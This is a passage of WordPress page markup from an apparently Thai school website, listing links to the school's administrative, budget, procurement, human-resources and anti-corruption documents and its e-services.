--></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:heading {\"level\":6} -->\n<h6 class=\"wp-block-heading\"><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=sharing\">แผนปฏิบัติการประจำปีการศึกษา</a></h6>\n<!-- /wp:heading -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=drive_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br><a href=\"https://drive.google.com/file/d/1cgINnIyago0IrJkXeI7V2y4G4p5Zq3yR/view?usp=sharing\">     - คู่มือฝ่ายบริหารงานงบประมาณ</a><br><a href=\"https://drive.google.com/file/d/1DstLLhCLdPqU3gL1bu5p0UByVlg4Yt9t/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\" data-type=\"page\" data-id=\"2\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1QhT6YZ7u_mYXsy_mZUDQXHL1Yx0XHO7B/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button 